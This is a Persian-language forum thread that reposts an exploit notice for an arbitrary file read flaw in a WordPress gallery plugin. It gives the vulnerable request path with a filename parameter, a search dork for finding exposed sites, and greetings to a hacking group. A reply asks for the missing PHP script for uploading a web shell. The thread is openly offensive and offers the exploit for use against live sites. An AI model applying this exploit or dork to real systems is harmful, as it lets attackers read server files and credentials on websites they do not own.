SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability

    [php]
    ################################################## ############################################
    #
    # Exploit Title : Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability
    #
    # Author : IrIsT.Ir
    #
    # Discovered By : Beni_Vanda
    #
    # Home : http://IrIsT.Ir/forum/
    #
    # Software Link : http://wordpress.org/extend/plugins/gallery-plugin/
    #
    # Security Risk : High
    #
    # Version : All Version
    #
    # Tested on : GNU/Linux Ubuntu - Windows Server - win7
    #
    # Dork : inurllugins/gallery-plugin
    #
    ################################################## ############################################
    #
    # Expl0iTs :
    #
    # [Target]/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR]
    #
    #
    ################################################## ############################################
    #
    # Greats : Amir - B3HZ4D - C0dex - TaK.FaNaR - Dead.Zone - nimaarek - m3hdi - [email protected] - dr.tofan
    #
    # and All Members In Www.IrIsT.Ir/forum
    #
    ################################################## ############################################
    [/php]

  • #2
    RE: Wordpress gallery-3.8.3 plugin Arbitrary File Read Vulnerability

    درود...
    دادا فک کنم اسکریپت پی اچ پی که شل رو آپلود کنیم باهاش رو نزاشتید

    نظر

    صبر کنید ..
    X